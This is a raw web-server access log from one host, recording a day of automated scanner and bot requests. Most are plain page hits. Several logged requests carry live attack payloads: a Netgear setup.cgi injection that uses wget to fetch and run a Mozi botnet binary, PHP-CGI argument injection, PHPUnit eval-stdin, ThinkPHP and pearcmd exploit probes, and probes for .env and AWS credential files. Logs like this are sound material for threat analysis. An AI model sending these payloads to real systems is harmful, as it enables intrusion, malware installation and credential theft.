222.117.41.51 "/" [Client 45.135.193.11] [Length 1033] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" +[17/Feb/2026:13:14:21 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" +[17/Feb/2026:13:14:21 +0000] 404 - GET http 222.117.41.51 "/.env.local" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" +[17/Feb/2026:13:14:21 +0000] 404 - GET http 222.117.41.51 "/.env.staging" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" +[17/Feb/2026:13:14:22 +0000] 404 - GET http 222.117.41.51 "/.env.production" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" +[17/Feb/2026:13:14:22 +0000] 404 - GET http 222.117.41.51 "/.env.development" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" +[17/Feb/2026:13:14:22 +0000] 404 - GET http 222.117.41.51 "/.aws/credentials" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" +[17/Feb/2026:13:14:22 +0000] 404 - GET http 222.117.41.51 "/app/.env" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" +[17/Feb/2026:13:14:23 +0000] 404 - GET http 222.117.41.51 "/config.json" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" +[17/Feb/2026:13:17:40 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:13:25:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" +[17/Feb/2026:13:28:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:13:33:34 +0000] 400 - - http localhost "-" [Client 78.135.107.107] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:13:35:30 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:13:49:11 +0000] 400 - GET http 222.117.41.51 "/" [Client 162.142.125.195] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[17/Feb/2026:13:49:13 +0000] 400 - - http localhost "-" [Client 162.142.125.195] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:13:49:38 +0000] 400 - GET http 222.117.41.51 "/security.txt" [Client 162.142.125.195] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[17/Feb/2026:13:51:49 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[17/Feb/2026:13:52:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:13:52:51 +0000] 400 - GET http 222.117.41.51 "/" [Client 185.242.226.111] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[17/Feb/2026:13:55:45 +0000] 200 - GET http 222.117.41.51 "/" [Client 35.195.168.139] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" +[17/Feb/2026:14:11:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:14:17:57 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:14:18:41 +0000] 404 - GET http localhost-nginx-proxy-manager "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1" [Client 27.43.206.93] [Length 150] [Gzip -] "-" "-" +[17/Feb/2026:14:21:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 78.135.107.107] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:14:29:48 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:14:31:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 49.51.166.228] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[17/Feb/2026:14:41:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:14:48:31 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" +[17/Feb/2026:14:48:32 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" +[17/Feb/2026:14:48:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:14:48:34 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:14:48:35 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" +[17/Feb/2026:15:09:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:15:09:59 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:15:12:51 +0000] 200 - GET http 222.117.41.51 "/" [Client 185.247.137.17] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" +[17/Feb/2026:15:19:51 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36" "-" +[17/Feb/2026:15:25:25 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" +[17/Feb/2026:15:25:50 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[17/Feb/2026:15:34:57 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:15:41:29 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:15:57:57 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:15:59:47 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[17/Feb/2026:16:03:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.166.237.57] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[17/Feb/2026:16:05:06 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:16:05:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 36.255.223.98] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:16:05:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 36.255.223.98] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:16:06:01 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 36.255.223.98] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:16:06:09 +0000] 404 - GET http 222.117.41.51 "/version" [Client 36.255.223.98] [Length 150] [Gzip -] "-" "-" +[17/Feb/2026:16:06:09 +0000] 200 - GET http 222.117.41.51 "/" [Client 36.255.223.98] [Length 1033] [Gzip -] "-" "-" +[17/Feb/2026:16:06:09 +0000] 200 - GET http 222.117.41.51 "/" [Client 36.255.223.98] [Length 1033] [Gzip -] "-" "-" +[17/Feb/2026:16:06:09 +0000] 404 - GET http 222.117.41.51 "/v1" [Client 36.255.223.98] [Length 150] [Gzip -] "-" "-" +[17/Feb/2026:16:06:09 +0000] 200 - GET http 222.117.41.51 "/" [Client 36.255.223.98] [Length 1033] [Gzip -] "-" "-" +[17/Feb/2026:16:06:13 +0000] 200 - GET http 222.117.41.51 "/" [Client 36.255.223.98] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[17/Feb/2026:16:06:13 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Feb/2026:16:10:05 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" +[17/Feb/2026:16:10:06 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" +[17/Feb/2026:16:10:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:16:10:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:16:16:35 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 129.212.186.7] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:16:16:36 +0000] 400 - - http localhost "-" [Client 129.212.186.7] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:16:23:57 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:16:35:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:16:39:28 +0000] 400 - GET http localhost-nginx-proxy-manager "/w00tw00t.at.ISC.SANS.DFind:)" [Client 52.76.147.90] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:16:48:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:17:00:45 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 94.72.116.78] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:17:00:49 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 94.72.116.78] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:17:00:50 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:00:53 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 94.72.116.78] [Length 154] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:00:55 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:00:57 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:00:58 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:00 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:02 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:03 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:05 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:06 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:07 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:08 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:09 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:11 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:11 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:12 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:14 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:15 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:16 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:17 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:18 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:19 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:20 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:20 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:22 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:23 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:24 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:26 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:27 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:30 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:30 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:17:01:32 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:34 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:36 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:38 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:41 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:44 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:47 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:49 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:51 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:53 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:54 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:56 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:58 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:01:59 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 94.72.116.78] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Feb/2026:17:08:14 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" +[17/Feb/2026:17:14:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:17:38:00 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:17:42:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:17:56:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:18:04:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:18:19:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.94.31.224] [Length 0] [Gzip -] "-" "-" +[17/Feb/2026:18:23:27 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 104.140.148.110] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:18:28:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:18:34:37 +0000] 200 - GET http 222.117.41.51 "/" [Client 46.101.11.153] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[17/Feb/2026:18:34:38 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Feb/2026:18:47:53 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:18:54:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:18:55:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:19:21:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:19:47:16 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:19:49:10 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 